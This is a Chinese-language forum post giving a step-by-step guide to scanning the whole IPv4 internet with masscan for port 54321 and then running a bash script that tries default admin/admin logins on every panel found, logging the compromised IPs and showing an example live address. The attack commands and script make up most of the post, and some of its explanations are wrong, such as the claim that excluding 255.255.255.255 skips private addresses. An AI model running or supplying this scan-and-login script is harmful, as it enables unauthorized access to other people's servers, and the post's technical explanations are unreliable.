一元网络论坛

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 306|回复: 0

详细指南:利用Ubuntu进行面板目标的端口探测操作

[复制链接]

3万

主题

3万

帖子

9万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
96169
发表于 2024-7-9 15:57:17 | 显示全部楼层 |阅读模式
```markdown
# 宇宙安全声明
## 1. 相关风险说明
- **安全性:** 进行网络扫描可能会触发服务器管理员或其他网络安全人员的关注。
- **法律责任:** 执行此类操作可能涉及违反相关法律法规。
## 2. VPS选择
为了降低风险,我选择了 AWS 提供的小善人的一年的免费 VPS 服务,操作系统是 Ubuntu。
## 3. 安装masscan
使用 `apt` 包管理器来安装 masscan 和必要的依赖库:
```
sudo apt update && sudo apt install masscan libpcap-dev
```
## 4. 安装nohup和curl
然后安装 `nohup` 和 `curl` 库以支持后台运行脚本和获取文件内容:
```
sudo apt install coreutils
```
## 5. 安装curl和vim
最后安装 `curl` 和 Vim 编辑器:
```
sudo apt install curl
sudo apt install vim
```
## 6. 执行端口扫描
现在我们开始端口扫描。首先切换到 root 用户,并运行以下命令:
```bash
su
nohup masscan 0.0.0.0/0 --exclude 255.255.255.255 -p54321 --max-rate 5000 -oJ scan.json &
```
这里,`0.0.0.0/0` 表示全面扫描,`--exclude 255.255.255.255` 用于排除私有 IP 地址,而 `-p54321` 指定要扫描的端口范围。`--max-rate 5000` 设置了扫描的最大速率限制。`-oJ scan.json` 将扫描结果保存为 JSON 格式。
## 7. 脚本测试端口密码
接下来,创建一个名为 `scan.sh` 的脚本,包含以下代码片段:
```bash
#!/bin/bash
for ip_ad in $(cat scan.json | jq -r '.[].ip'); do
    if curl --max-time 1 http://$ip_ad:54321; then
        res=$(curl "http://$ip_ad:54321/login"  --data-raw 'username=admin&password=admin' --compressed  --insecure)
        if [[ "$res" =~ .*true.* ]]; then
            echo "$ip_ad" >> week.log
            echo "$ip_ad" >> all.log
        fi
    fi
done
```
这个脚本会遍历 `scan.json` 文件中的每一行,检查是否包含有效登录信息。如果有,它会将 IP 地址添加到 `week.log` 或 `all.log` 文件中。
## 8. 运行测试脚本
最后一步是启动测试脚本。这可以通过运行以下命令实现:
```bash
su
nohup bash scan.sh &
```
## 9. 收获IP
等待几分钟或更长时间,你的终端应生成一系列包含 IP 地址的文件。这些 IP 地址位于 `/home/your_user/scan/week.log` 和 `/home/your_user/scan/all.log` 文件中。
## 示例
例如,你可以通过访问 `http://154.44.9.171:54321/` 来验证一个有效的 IP 地址。
请注意,这里的 IP 地址和密码都是公开提供的示例。实际应用时,请确保使用真实且安全的凭据。
如果您发现此教程有帮助,请点赞分享!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|一元网络论坛

GMT+8, 2024-12-26 02:45 , Processed in 0.076457 second(s), 20 queries .

Powered by Discuz! X3.4

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表